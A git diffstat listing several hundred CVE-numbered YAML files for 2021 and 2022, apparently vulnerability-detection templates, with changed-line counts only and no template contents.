http/cves/2021/CVE-2021-41266.yaml | 2 +- http/cves/2021/CVE-2021-41277.yaml | 4 ++-- http/cves/2021/CVE-2021-41282.yaml | 2 +- http/cves/2021/CVE-2021-41291.yaml | 2 +- http/cves/2021/CVE-2021-41293.yaml | 2 +- http/cves/2021/CVE-2021-41349.yaml | 4 ++-- http/cves/2021/CVE-2021-41381.yaml | 2 +- http/cves/2021/CVE-2021-41432.yaml | 4 ++-- http/cves/2021/CVE-2021-41460.yaml | 4 ++-- http/cves/2021/CVE-2021-41467.yaml | 2 +- http/cves/2021/CVE-2021-41569.yaml | 4 ++-- http/cves/2021/CVE-2021-41648.yaml | 2 +- http/cves/2021/CVE-2021-41649.yaml | 4 ++-- http/cves/2021/CVE-2021-41653.yaml | 2 +- http/cves/2021/CVE-2021-41749.yaml | 4 ++-- http/cves/2021/CVE-2021-41773.yaml | 4 ++-- http/cves/2021/CVE-2021-41826.yaml | 2 +- http/cves/2021/CVE-2021-41878.yaml | 2 +- http/cves/2021/CVE-2021-4191.yaml | 4 ++-- http/cves/2021/CVE-2021-41951.yaml | 2 +- http/cves/2021/CVE-2021-42013.yaml | 4 ++-- http/cves/2021/CVE-2021-42063.yaml | 4 ++-- http/cves/2021/CVE-2021-42071.yaml | 2 +- http/cves/2021/CVE-2021-42192.yaml | 4 ++-- http/cves/2021/CVE-2021-42237.yaml | 4 ++-- http/cves/2021/CVE-2021-42258.yaml | 4 ++-- http/cves/2021/CVE-2021-42551.yaml | 2 +- http/cves/2021/CVE-2021-42565.yaml | 2 +- http/cves/2021/CVE-2021-42566.yaml | 2 +- http/cves/2021/CVE-2021-42567.yaml | 2 +- http/cves/2021/CVE-2021-42627.yaml | 4 ++-- http/cves/2021/CVE-2021-42663.yaml | 2 +- http/cves/2021/CVE-2021-42667.yaml | 4 ++-- http/cves/2021/CVE-2021-42887.yaml | 4 ++-- http/cves/2021/CVE-2021-43062.yaml | 4 ++-- http/cves/2021/CVE-2021-43287.yaml | 4 ++-- http/cves/2021/CVE-2021-43421.yaml | 4 ++-- http/cves/2021/CVE-2021-43495.yaml | 2 +- http/cves/2021/CVE-2021-43496.yaml | 2 +- http/cves/2021/CVE-2021-43510.yaml | 4 ++-- http/cves/2021/CVE-2021-43574.yaml | 2 +- http/cves/2021/CVE-2021-43725.yaml | 4 ++-- http/cves/2021/CVE-2021-43734.yaml | 2 +- http/cves/2021/CVE-2021-43778.yaml | 4 ++-- http/cves/2021/CVE-2021-43798.yaml | 4 ++-- http/cves/2021/CVE-2021-43810.yaml | 2 +- http/cves/2021/CVE-2021-44077.yaml | 2 +- http/cves/2021/CVE-2021-44138.yaml | 4 ++-- http/cves/2021/CVE-2021-44139.yaml | 2 +- http/cves/2021/CVE-2021-44152.yaml | 4 ++-- http/cves/2021/CVE-2021-44427.yaml | 4 ++-- http/cves/2021/CVE-2021-44451.yaml | 4 ++-- http/cves/2021/CVE-2021-44515.yaml | 4 ++-- http/cves/2021/CVE-2021-44528.yaml | 2 +- http/cves/2021/CVE-2021-44529.yaml | 4 ++-- http/cves/2021/CVE-2021-44848.yaml | 2 +- http/cves/2021/CVE-2021-44910.yaml | 2 ++ http/cves/2021/CVE-2021-45043.yaml | 2 +- http/cves/2021/CVE-2021-45092.yaml | 4 ++-- http/cves/2021/CVE-2021-45232.yaml | 4 ++-- http/cves/2021/CVE-2021-45380.yaml | 2 +- http/cves/2021/CVE-2021-45382.yaml | 2 +- http/cves/2021/CVE-2021-45422.yaml | 2 +- http/cves/2021/CVE-2021-45428.yaml | 2 +- http/cves/2021/CVE-2021-45967.yaml | 7 ++++--- http/cves/2021/CVE-2021-45968.yaml | 2 +- http/cves/2021/CVE-2021-46005.yaml | 2 +- http/cves/2021/CVE-2021-46068.yaml | 2 +- http/cves/2021/CVE-2021-46069.yaml | 2 +- http/cves/2021/CVE-2021-46071.yaml | 2 +- http/cves/2021/CVE-2021-46072.yaml | 2 +- http/cves/2021/CVE-2021-46073.yaml | 2 +- http/cves/2021/CVE-2021-46107.yaml | 2 +- http/cves/2021/CVE-2021-46379.yaml | 4 ++-- http/cves/2021/CVE-2021-46381.yaml | 4 ++-- http/cves/2021/CVE-2021-46387.yaml | 2 +- http/cves/2021/CVE-2021-46417.yaml | 4 ++-- http/cves/2021/CVE-2021-46422.yaml | 4 ++-- http/cves/2021/CVE-2021-46424.yaml | 2 +- http/cves/2021/CVE-2021-46704.yaml | 4 ++-- http/cves/2022/CVE-2022-0087.yaml | 9 +++++++++ http/cves/2022/CVE-2022-0140.yaml | 2 +- http/cves/2022/CVE-2022-0147.yaml | 2 +- http/cves/2022/CVE-2022-0148.yaml | 2 +- http/cves/2022/CVE-2022-0149.yaml | 2 +- http/cves/2022/CVE-2022-0150.yaml | 2 +- http/cves/2022/CVE-2022-0165.yaml | 2 +- http/cves/2022/CVE-2022-0169.yaml | 4 ++-- http/cves/2022/CVE-2022-0189.yaml | 2 +- http/cves/2022/CVE-2022-0201.yaml | 2 +- http/cves/2022/CVE-2022-0206.yaml | 2 +- http/cves/2022/CVE-2022-0208.yaml | 2 +- http/cves/2022/CVE-2022-0212.yaml | 2 +- http/cves/2022/CVE-2022-0218.yaml | 2 +- http/cves/2022/CVE-2022-0220.yaml | 2 +- http/cves/2022/CVE-2022-0228.yaml | 4 ++-- http/cves/2022/CVE-2022-0234.yaml | 2 +- http/cves/2022/CVE-2022-0271.yaml | 2 +- http/cves/2022/CVE-2022-0281.yaml | 4 ++-- http/cves/2022/CVE-2022-0288.yaml | 2 +- http/cves/2022/CVE-2022-0342.yaml | 2 +- http/cves/2022/CVE-2022-0346.yaml | 4 ++-- http/cves/2022/CVE-2022-0349.yaml | 2 +- http/cves/2022/CVE-2022-0378.yaml | 2 +- http/cves/2022/CVE-2022-0381.yaml | 2 +- http/cves/2022/CVE-2022-0412.yaml | 4 ++-- http/cves/2022/CVE-2022-0415.yaml | 2 +- http/cves/2022/CVE-2022-0422.yaml | 2 +- http/cves/2022/CVE-2022-0432.yaml | 2 +- http/cves/2022/CVE-2022-0434.yaml | 2 +- http/cves/2022/CVE-2022-0437.yaml | 2 +- http/cves/2022/CVE-2022-0441.yaml | 2 +- http/cves/2022/CVE-2022-0482.yaml | 4 ++-- http/cves/2022/CVE-2022-0533.yaml | 2 +- http/cves/2022/CVE-2022-0535.yaml | 2 +- http/cves/2022/CVE-2022-0540.yaml | 4 ++-- http/cves/2022/CVE-2022-0591.yaml | 2 +- http/cves/2022/CVE-2022-0594.yaml | 4 ++-- http/cves/2022/CVE-2022-0595.yaml | 2 +- http/cves/2022/CVE-2022-0597.yaml | 2 +- http/cves/2022/CVE-2022-0599.yaml | 2 +- http/cves/2022/CVE-2022-0651.yaml | 2 +- http/cves/2022/CVE-2022-0653.yaml | 2 +- http/cves/2022/CVE-2022-0656.yaml | 4 ++-- http/cves/2022/CVE-2022-0658.yaml | 4 ++-- http/cves/2022/CVE-2022-0660.yaml | 2 +- http/cves/2022/CVE-2022-0678.yaml | 4 ++-- http/cves/2022/CVE-2022-0679.yaml | 2 +- http/cves/2022/CVE-2022-0692.yaml | 2 +- http/cves/2022/CVE-2022-0693.yaml | 4 ++-- http/cves/2022/CVE-2022-0735.yaml | 2 +- http/cves/2022/CVE-2022-0747.yaml | 2 +- http/cves/2022/CVE-2022-0760.yaml | 2 +- http/cves/2022/CVE-2022-0769.yaml | 4 ++-- http/cves/2022/CVE-2022-0773.yaml | 4 ++-- http/cves/2022/CVE-2022-0776.yaml | 2 +- http/cves/2022/CVE-2022-0781.yaml | 4 ++-- http/cves/2022/CVE-2022-0784.yaml | 4 ++-- http/cves/2022/CVE-2022-0785.yaml | 2 +- http/cves/2022/CVE-2022-0786.yaml | 4 ++-- http/cves/2022/CVE-2022-0787.yaml | 4 ++-- http/cves/2022/CVE-2022-0788.yaml | 4 ++-- http/cves/2022/CVE-2022-0814.yaml | 4 ++-- http/cves/2022/CVE-2022-0817.yaml | 4 ++-- http/cves/2022/CVE-2022-0824.yaml | 4 ++-- http/cves/2022/CVE-2022-0826.yaml | 4 ++-- http/cves/2022/CVE-2022-0827.yaml | 4 ++-- http/cves/2022/CVE-2022-0846.yaml | 4 ++-- http/cves/2022/CVE-2022-0864.yaml | 2 +- http/cves/2022/CVE-2022-0867.yaml | 4 ++-- http/cves/2022/CVE-2022-0869.yaml | 2 +- http/cves/2022/CVE-2022-0870.yaml | 2 +- http/cves/2022/CVE-2022-0885.yaml | 4 ++-- http/cves/2022/CVE-2022-0899.yaml | 4 ++-- http/cves/2022/CVE-2022-0928.yaml | 2 +- http/cves/2022/CVE-2022-0948.yaml | 4 ++-- http/cves/2022/CVE-2022-0949.yaml | 4 ++-- http/cves/2022/CVE-2022-0952.yaml | 4 ++-- http/cves/2022/CVE-2022-0954.yaml | 2 +- http/cves/2022/CVE-2022-0963.yaml | 2 +- http/cves/2022/CVE-2022-0968.yaml | 2 +- http/cves/2022/CVE-2022-1007.yaml | 2 +- http/cves/2022/CVE-2022-1013.yaml | 4 ++-- http/cves/2022/CVE-2022-1020.yaml | 4 ++-- http/cves/2022/CVE-2022-1040.yaml | 4 ++-- http/cves/2022/CVE-2022-1054.yaml | 2 +- http/cves/2022/CVE-2022-1057.yaml | 4 ++-- http/cves/2022/CVE-2022-1058.yaml | 2 +- http/cves/2022/CVE-2022-1119.yaml | 4 ++-- http/cves/2022/CVE-2022-1162.yaml | 2 +- http/cves/2022/CVE-2022-1168.yaml | 2 +- http/cves/2022/CVE-2022-1170.yaml | 2 +- http/cves/2022/CVE-2022-1221.yaml | 4 ++-- http/cves/2022/CVE-2022-1329.yaml | 4 ++-- http/cves/2022/CVE-2022-1386.yaml | 4 ++-- http/cves/2022/CVE-2022-1388.yaml | 4 ++-- http/cves/2022/CVE-2022-1390.yaml | 4 ++-- http/cves/2022/CVE-2022-1391.yaml | 4 ++-- http/cves/2022/CVE-2022-1392.yaml | 4 ++-- http/cves/2022/CVE-2022-1398.yaml | 4 ++-- http/cves/2022/CVE-2022-1439.yaml | 2 +- http/cves/2022/CVE-2022-1442.yaml | 4 ++-- http/cves/2022/CVE-2022-1574.yaml | 4 ++-- http/cves/2022/CVE-2022-1595.yaml | 4 ++-- http/cves/2022/CVE-2022-1597.yaml | 4 ++-- http/cves/2022/CVE-2022-1598.yaml | 4 ++-- http/cves/2022/CVE-2022-1713.yaml | 4 ++-- http/cves/2022/CVE-2022-1724.yaml | 4 ++-- http/cves/2022/CVE-2022-1756.yaml | 4 ++-- http/cves/2022/CVE-2022-1768.yaml | 4 ++-- http/cves/2022/CVE-2022-1815.yaml | 6 +++--- http/cves/2022/CVE-2022-1883.yaml | 4 ++-- http/cves/2022/CVE-2022-1903.yaml | 4 ++-- http/cves/2022/CVE-2022-1904.yaml | 4 ++-- http/cves/2022/CVE-2022-1906.yaml | 4 ++-- http/cves/2022/CVE-2022-1910.yaml | 4 ++-- http/cves/2022/CVE-2022-1916.yaml | 4 ++-- http/cves/2022/CVE-2022-1933.yaml | 4 ++-- http/cves/2022/CVE-2022-1937.yaml | 4 ++-- http/cves/2022/CVE-2022-1946.yaml | 4 ++-- http/cves/2022/CVE-2022-1952.yaml | 4 ++-- http/cves/2022/CVE-2022-2034.yaml | 4 ++-- http/cves/2022/CVE-2022-21371.yaml | 2 +- http/cves/2022/CVE-2022-21500.yaml | 4 ++-- http/cves/2022/CVE-2022-21587.yaml | 4 ++-- http/cves/2022/CVE-2022-21661.yaml | 4 ++-- http/cves/2022/CVE-2022-21705.yaml | 2 +- http/cves/2022/CVE-2022-2174.yaml | 4 ++-- http/cves/2022/CVE-2022-2185.yaml | 2 +- http/cves/2022/CVE-2022-2187.yaml | 4 ++-- http/cves/2022/CVE-2022-2219.yaml | 4 ++-- http/cves/2022/CVE-2022-22242.yaml | 2 +- http/cves/2022/CVE-2022-22536.yaml | 2 +- http/cves/2022/CVE-2022-22733.yaml | 4 ++-- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-2290.yaml | 4 ++-- http/cves/2022/CVE-2022-22947.yaml | 4 ++-- http/cves/2022/CVE-2022-22954.yaml | 4 ++-- http/cves/2022/CVE-2022-22963.yaml | 4 ++-- http/cves/2022/CVE-2022-22965.yaml | 4 ++-- http/cves/2022/CVE-2022-22972.yaml | 4 ++-- http/cves/2022/CVE-2022-23102.yaml | 2 +- http/cves/2022/CVE-2022-23131.yaml | 4 ++-- http/cves/2022/CVE-2022-23134.yaml | 4 ++-- http/cves/2022/CVE-2022-2314.yaml | 4 ++-- http/cves/2022/CVE-2022-23178.yaml | 2 +- http/cves/2022/CVE-2022-23347.yaml | 4 ++-- http/cves/2022/CVE-2022-23348.yaml | 2 +- http/cves/2022/CVE-2022-23544.yaml | 4 ++-- http/cves/2022/CVE-2022-2373.yaml | 4 ++-- http/cves/2022/CVE-2022-2376.yaml | 4 ++-- http/cves/2022/CVE-2022-23779.yaml | 4 ++-- http/cves/2022/CVE-2022-2379.yaml | 2 +- http/cves/2022/CVE-2022-23808.yaml | 4 ++-- http/cves/2022/CVE-2022-2383.yaml | 2 +- http/cves/2022/CVE-2022-23854.yaml | 4 ++-- http/cves/2022/CVE-2022-23881.yaml | 2 +- http/cves/2022/CVE-2022-23898.yaml | 2 +- http/cves/2022/CVE-2022-23944.yaml | 4 ++-- http/cves/2022/CVE-2022-24112.yaml | 4 ++-- http/cves/2022/CVE-2022-24124.yaml | 4 ++-- http/cves/2022/CVE-2022-24129.yaml | 2 +- http/cves/2022/CVE-2022-2414.yaml | 4 ++-- http/cves/2022/CVE-2022-24181.yaml | 4 ++-- http/cves/2022/CVE-2022-24223.yaml | 4 ++-- http/cves/2022/CVE-2022-24260.yaml | 2 +- http/cves/2022/CVE-2022-24264.yaml | 4 ++-- http/cves/2022/CVE-2022-24265.yaml | 4 ++-- http/cves/2022/CVE-2022-24266.yaml | 4 ++-- http/cves/2022/CVE-2022-24288.yaml | 4 ++-- http/cves/2022/CVE-2022-24384.yaml | 2 +- http/cves/2022/CVE-2022-2462.yaml | 4 ++-- http/cves/2022/CVE-2022-2467.yaml | 4 ++-- http/cves/2022/CVE-2022-24681.yaml | 2 +- http/cves/2022/CVE-2022-24716.yaml | 4 ++-- http/cves/2022/CVE-2022-24816.yaml | 2 +- http/cves/2022/CVE-2022-24856.yaml | 4 ++-- http/cves/2022/CVE-2022-2486.yaml | 4 ++-- http/cves/2022/CVE-2022-2487.yaml | 4 ++-- http/cves/2022/CVE-2022-2488.yaml | 4 ++-- http/cves/2022/CVE-2022-24899.yaml | 2 +- http/cves/2022/CVE-2022-24900.yaml | 4 ++-- http/cves/2022/CVE-2022-24990.yaml | 4 ++-- http/cves/2022/CVE-2022-25082.yaml | 2 +- http/cves/2022/CVE-2022-25125.yaml | 2 +- http/cves/2022/CVE-2022-25148.yaml | 2 +- http/cves/2022/CVE-2022-25149.yaml | 2 +- http/cves/2022/CVE-2022-25216.yaml | 2 +- http/cves/2022/CVE-2022-25323.yaml | 2 +- http/cves/2022/CVE-2022-2535.yaml | 4 ++-- http/cves/2022/CVE-2022-25356.yaml | 2 +- http/cves/2022/CVE-2022-2544.yaml | 2 +- http/cves/2022/CVE-2022-2546.yaml | 4 ++-- http/cves/2022/CVE-2022-25481.yaml | 2 +- http/cves/2022/CVE-2022-25485.yaml | 2 +- http/cves/2022/CVE-2022-25486.yaml | 2 +- http/cves/2022/CVE-2022-25487.yaml | 2 +- http/cves/2022/CVE-2022-25488.yaml | 4 ++-- http/cves/2022/CVE-2022-25489.yaml | 4 ++-- http/cves/2022/CVE-2022-25497.yaml | 4 ++-- http/cves/2022/CVE-2022-2551.yaml | 2 +- http/cves/2022/CVE-2022-25568.yaml | 2 +- http/cves/2022/CVE-2022-2599.yaml | 2 +- http/cves/2022/CVE-2022-26134.yaml | 4 ++-- http/cves/2022/CVE-2022-26138.yaml | 4 ++-- http/cves/2022/CVE-2022-26148.yaml | 2 +- http/cves/2022/CVE-2022-26159.yaml | 2 +- http/cves/2022/CVE-2022-26233.yaml | 2 +- http/cves/2022/CVE-2022-26263.yaml | 2 +- http/cves/2022/CVE-2022-2627.yaml | 2 +- http/cves/2022/CVE-2022-2633.yaml | 6 +++--- http/cves/2022/CVE-2022-26352.yaml | 4 ++-- http/cves/2022/CVE-2022-26564.yaml | 2 +- http/cves/2022/CVE-2022-26833.yaml | 4 ++-- http/cves/2022/CVE-2022-26960.yaml | 2 +- http/cves/2022/CVE-2022-2733.yaml | 4 ++-- http/cves/2022/CVE-2022-2756.yaml | 4 ++-- http/cves/2022/CVE-2022-27593.yaml | 4 ++-- http/cves/2022/CVE-2022-27849.yaml | 2 +- http/cves/2022/CVE-2022-27926.yaml | 2 +- http/cves/2022/CVE-2022-27927.yaml | 4 ++-- http/cves/2022/CVE-2022-27984.yaml | 4 ++-- http/cves/2022/CVE-2022-27985.yaml | 4 ++-- http/cves/2022/CVE-2022-28022.yaml | 4 ++-- http/cves/2022/CVE-2022-28023.yaml | 4 ++-- http/cves/2022/CVE-2022-28032.yaml | 4 ++-- http/cves/2022/CVE-2022-28079.yaml | 4 ++-- http/cves/2022/CVE-2022-28080.yaml | 4 ++-- http/cves/2022/CVE-2022-28117.yaml | 4 ++-- http/cves/2022/CVE-2022-28219.yaml | 4 ++-- http/cves/2022/CVE-2022-28290.yaml | 2 +- http/cves/2022/CVE-2022-28363.yaml | 2 +- http/cves/2022/CVE-2022-28365.yaml | 2 +- http/cves/2022/CVE-2022-2863.yaml | 4 ++-- http/cves/2022/CVE-2022-28923.yaml | 4 ++-- http/cves/2022/CVE-2022-28955.yaml | 4 ++-- http/cves/2022/CVE-2022-29004.yaml | 4 ++-- http/cves/2022/CVE-2022-29005.yaml | 4 ++-- http/cves/2022/CVE-2022-29006.yaml | 2 +- http/cves/2022/CVE-2022-29007.yaml | 2 +- http/cves/2022/CVE-2022-29009.yaml | 2 +- http/cves/2022/CVE-2022-29014.yaml | 4 ++-- http/cves/2022/CVE-2022-29078.yaml | 4 ++-- http/cves/2022/CVE-2022-29153.yaml | 4 ++-- http/cves/2022/CVE-2022-29272.yaml | 2 +- http/cves/2022/CVE-2022-29298.yaml | 4 ++-- http/cves/2022/CVE-2022-29303.yaml | 4 ++-- http/cves/2022/CVE-2022-29349.yaml | 4 ++-- http/cves/2022/CVE-2022-29383.yaml | 4 ++-- http/cves/2022/CVE-2022-29455.yaml | 4 ++-- http/cves/2022/CVE-2022-29464.yaml | 4 ++-- http/cves/2022/CVE-2022-29548.yaml | 2 +- http/cves/2022/CVE-2022-29775.yaml | 4 ++-- http/cves/2022/CVE-2022-30073.yaml | 2 +- http/cves/2022/CVE-2022-30489.yaml | 2 +- http/cves/2022/CVE-2022-30512.yaml | 4 ++-- http/cves/2022/CVE-2022-30513.yaml | 4 ++-- http/cves/2022/CVE-2022-30514.yaml | 4 ++-- http/cves/2022/CVE-2022-30525.yaml | 4 ++-- http/cves/2022/CVE-2022-3062.yaml | 2 +- http/cves/2022/CVE-2022-30776.yaml | 2 +- http/cves/2022/CVE-2022-30777.yaml | 2 +- http/cves/2022/CVE-2022-31126.yaml | 4 ++-- http/cves/2022/CVE-2022-31268.yaml | 4 ++-- http/cves/2022/CVE-2022-31269.yaml | 2 +- http/cves/2022/CVE-2022-31299.yaml | 4 ++-- http/cves/2022/CVE-2022-31373.yaml | 4 ++-- http/cves/2022/CVE-2022-3142.yaml | 2 +- http/cves/2022/CVE-2022-31474.yaml | 4 ++-- http/cves/2022/CVE-2022-31499.yaml | 4 ++-- http/cves/2022/CVE-2022-31656.yaml | 4 ++-- http/cves/2022/CVE-2022-31798.yaml | 2 +- http/cves/2022/CVE-2022-31814.yaml | 4 ++-- http/cves/2022/CVE-2022-31845.yaml | 4 ++-- http/cves/2022/CVE-2022-31846.yaml | 4 ++-- http/cves/2022/CVE-2022-31847.yaml | 4 ++-- http/cves/2022/CVE-2022-31854.yaml | 2 +- http/cves/2022/CVE-2022-31879.yaml | 4 ++-- http/cves/2022/CVE-2022-31974.yaml | 4 ++-- http/cves/2022/CVE-2022-31975.yaml | 4 ++-- http/cves/2022/CVE-2022-31976.yaml | 4 ++-- http/cves/2022/CVE-2022-31977.yaml | 4 ++-- http/cves/2022/CVE-2022-31978.yaml | 4 ++-- http/cves/2022/CVE-2022-31980.yaml | 4 ++-- http/cves/2022/CVE-2022-31981.yaml | 4 ++-- http/cves/2022/CVE-2022-31982.yaml | 4 ++-- http/cves/2022/CVE-2022-31983.yaml | 4 ++-- http/cves/2022/CVE-2022-31984.yaml | 4 ++-- http/cves/2022/CVE-2022-32007.yaml | 4 ++-- http/cves/2022/CVE-2022-32015.yaml | 4 ++-- http/cves/2022/CVE-2022-32018.yaml | 4 ++-- http/cves/2022/CVE-2022-32022.yaml | 4 ++-- http/cves/2022/CVE-2022-32024.yaml | 4 ++-- http/cves/2022/CVE-2022-32025.yaml | 4 ++-- http/cves/2022/CVE-2022-32026.yaml | 4 ++-- http/cves/2022/CVE-2022-32028.yaml | 4 ++-- http/cves/2022/CVE-2022-32094.yaml | 4 ++-- http/cves/2022/CVE-2022-32195.yaml | 4 ++-- http/cves/2022/CVE-2022-32409.yaml | 4 ++-- http/cves/2022/CVE-2022-3242.yaml | 4 ++-- http/cves/2022/CVE-2022-32429.yaml | 4 ++-- http/cves/2022/CVE-2022-32444.yaml | 4 ++-- http/cves/2022/CVE-2022-32770.yaml | 2 +- http/cves/2022/CVE-2022-32771.yaml | 2 +- http/cves/2022/CVE-2022-32772.yaml | 2 +- http/cves/2022/CVE-2022-33119.yaml | 4 ++-- http/cves/2022/CVE-2022-33174.yaml | 4 ++-- http/cves/2022/CVE-2022-33891.yaml | 4 ++-- http/cves/2022/CVE-2022-33901.yaml | 4 ++-- http/cves/2022/CVE-2022-33965.yaml | 4 ++-- http/cves/2022/CVE-2022-34045.yaml | 4 ++-- http/cves/2022/CVE-2022-34046.yaml | 4 ++-- http/cves/2022/CVE-2022-34047.yaml | 4 ++-- http/cves/2022/CVE-2022-34048.yaml | 4 ++-- http/cves/2022/CVE-2022-34049.yaml | 4 ++-- http/cves/2022/CVE-2022-34093.yaml | 4 ++-- http/cves/2022/CVE-2022-34094.yaml | 4 ++-- http/cves/2022/CVE-2022-34121.yaml | 4 ++-- http/cves/2022/CVE-2022-34328.yaml | 4 ++-- http/cves/2022/CVE-2022-34576.yaml | 4 ++-- http/cves/2022/CVE-2022-34590.yaml | 4 ++-- http/cves/2022/CVE-2022-34753.yaml | 4 ++-- http/cves/2022/CVE-2022-3484.yaml | 4 ++-- http/cves/2022/CVE-2022-3506.yaml | 2 +- http/cves/2022/CVE-2022-35151.yaml | 4 ++-- http/cves/2022/CVE-2022-35405.yaml | 4 ++-- http/cves/2022/CVE-2022-35413.yaml | 4 ++-- http/cves/2022/CVE-2022-35416.yaml | 4 ++-- http/cves/2022/CVE-2022-35493.yaml | 2 +- http/cves/2022/CVE-2022-35653.yaml | 4 ++-- http/cves/2022/CVE-2022-3578.yaml | 4 ++-- http/cves/2022/CVE-2022-35914.yaml | 4 ++-- http/cves/2022/CVE-2022-36446.yaml | 4 ++-- http/cves/2022/CVE-2022-36537.yaml | 4 ++-- http/cves/2022/CVE-2022-36553.yaml | 4 ++-- http/cves/2022/CVE-2022-36642.yaml | 2 +- http/cves/2022/CVE-2022-36804.yaml | 4 ++-- http/cves/2022/CVE-2022-36883.yaml | 4 ++-- http/cves/2022/CVE-2022-37042.yaml | 4 ++-- http/cves/2022/CVE-2022-37153.yaml | 2 +- http/cves/2022/CVE-2022-37190.yaml | 2 +- http/cves/2022/CVE-2022-37191.yaml | 2 +- http/cves/2022/CVE-2022-37299.yaml | 4 ++-- http/cves/2022/CVE-2022-3768.yaml | 2 +- http/cves/2022/CVE-2022-3800.yaml | 2 +- http/cves/2022/CVE-2022-38295.yaml | 4 ++-- http/cves/2022/CVE-2022-38296.yaml | 2 +- http/cves/2022/CVE-2022-38463.yaml | 2 +- http/cves/2022/CVE-2022-38467.yaml | 4 ++-- http/cves/2022/CVE-2022-38553.yaml | 4 ++-- http/cves/2022/CVE-2022-38637.yaml | 2 +- http/cves/2022/CVE-2022-38794.yaml | 4 ++-- http/cves/2022/CVE-2022-38817.yaml | 4 ++-- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-39048.yaml | 4 ++-- http/cves/2022/CVE-2022-3908.yaml | 4 ++-- http/cves/2022/CVE-2022-39195.yaml | 4 ++-- http/cves/2022/CVE-2022-3933.yaml | 4 ++-- http/cves/2022/CVE-2022-3934.yaml | 4 ++-- http/cves/2022/CVE-2022-3980.yaml | 4 ++-- http/cves/2022/CVE-2022-3982.yaml | 4 ++-- http/cves/2022/CVE-2022-39952.yaml | 6 +++--- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-39986.yaml | 4 ++-- http/cves/2022/CVE-2022-40022.yaml | 4 ++-- http/cves/2022/CVE-2022-40032.yaml | 4 ++-- http/cves/2022/CVE-2022-40047.yaml | 2 +- http/cves/2022/CVE-2022-40083.yaml | 4 ++-- http/cves/2022/CVE-2022-40127.yaml | 4 ++-- http/cves/2022/CVE-2022-40359.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 4 ++-- http/cves/2022/CVE-2022-4050.yaml | 4 ++-- http/cves/2022/CVE-2022-4057.yaml | 4 ++-- http/cves/2022/CVE-2022-4059.yaml | 4 ++-- http/cves/2022/CVE-2022-4060.yaml | 4 ++-- http/cves/2022/CVE-2022-4063.yaml | 4 ++-- http/cves/2022/CVE-2022-40684.yaml | 4 ++-- http/cves/2022/CVE-2022-40734.yaml | 4 ++-- http/cves/2022/CVE-2022-40843.yaml | 2 +- http/cves/2022/CVE-2022-40879.yaml | 4 ++-- http/cves/2022/CVE-2022-40881.yaml | 4 ++-- http/cves/2022/CVE-2022-4117.yaml | 4 ++-- http/cves/2022/CVE-2022-4140.yaml | 4 ++-- http/cves/2022/CVE-2022-41441.yaml | 4 ++-- http/cves/2022/CVE-2022-41473.yaml | 4 ++-- http/cves/2022/CVE-2022-41840.yaml | 4 ++-- http/cves/2022/CVE-2022-42094.yaml | 4 ++-- http/cves/2022/CVE-2022-42095.yaml | 4 ++-- http/cves/2022/CVE-2022-42096.yaml | 4 ++-- http/cves/2022/CVE-2022-42233.yaml | 4 ++-- http/cves/2022/CVE-2022-4260.yaml | 4 ++-- http/cves/2022/CVE-2022-42746.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4295.yaml | 4 ++-- http/cves/2022/CVE-2022-4301.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43016.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4305.yaml | 4 ++-- http/cves/2022/CVE-2022-4306.yaml | 4 ++-- http/cves/2022/CVE-2022-43140.yaml | 4 ++-- http/cves/2022/CVE-2022-43164.yaml | 2 +- http/cves/2022/CVE-2022-43165.yaml | 2 +- http/cves/2022/CVE-2022-43166.yaml | 2 +- http/cves/2022/CVE-2022-43167.yaml | 2 +- http/cves/2022/CVE-2022-43169.yaml | 2 +- http/cves/2022/CVE-2022-43170.yaml | 2 +- http/cves/2022/CVE-2022-43185.yaml | 4 ++-- http/cves/2022/CVE-2022-4320.yaml | 4 ++-- http/cves/2022/CVE-2022-4321.yaml | 4 ++-- http/cves/2022/CVE-2022-4325.yaml | 2 +- http/cves/2022/CVE-2022-4328.yaml | 4 ++-- http/cves/2022/CVE-2022-43769.yaml | 4 ++-- http/cves/2022/CVE-2022-44290.yaml | 4 ++-- http/cves/2022/CVE-2022-44291.yaml | 4 ++-- http/cves/2022/CVE-2022-4447.yaml | 4 ++-- http/cves/2022/CVE-2022-44877.yaml | 4 ++-- http/cves/2022/CVE-2022-44944.yaml | 2 +- http/cves/2022/CVE-2022-44946.yaml | 2 +- http/cves/2022/CVE-2022-44947.yaml | 2 +- http/cves/2022/CVE-2022-44948.yaml | 2 +- http/cves/2022/CVE-2022-44949.yaml | 2 +- http/cves/2022/CVE-2022-44950.yaml | 2 +- http/cves/2022/CVE-2022-44951.yaml | 2 +- http/cves/2022/CVE-2022-44952.yaml | 2 +- http/cves/2022/CVE-2022-44957.yaml | 2 +- http/cves/2022/CVE-2022-45037.yaml | 2 +- http/cves/2022/CVE-2022-45038.yaml | 2 +- http/cves/2022/CVE-2022-45354.yaml | 13 ++++++++++++- http/cves/2022/CVE-2022-45362.yaml | 14 +++++++++----- http/cves/2022/CVE-2022-45365.yaml | 7 +++++++ http/cves/2022/CVE-2022-45805.yaml | 4 ++-- http/cves/2022/CVE-2022-45835.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 4 ++-- http/cves/2022/CVE-2022-45933.yaml | 4 ++-- http/cves/2022/CVE-2022-46020.yaml | 4 ++-- http/cves/2022/CVE-2022-46071.yaml | 4 ++-- http/cves/2022/CVE-2022-46073.yaml | 4 ++-- http/cves/2022/CVE-2022-46169.yaml | 6 +++--- http/cves/2022/CVE-2022-46381.yaml | 4 ++-- http/cves/2022/CVE-2022-46443.yaml | 4 ++-- http/cves/2022/CVE-2022-46463.yaml | 4 ++-- http/cves/2022/CVE-2022-46888.yaml | 4 ++-- http/cves/2022/CVE-2022-46934.yaml | 4 ++-- http/cves/2022/CVE-2022-47002.yaml | 4 ++-- http/cves/2022/CVE-2022-47003.yaml | 4 ++-- http/cves/2022/CVE-2022-47075.yaml | 4 ++-- 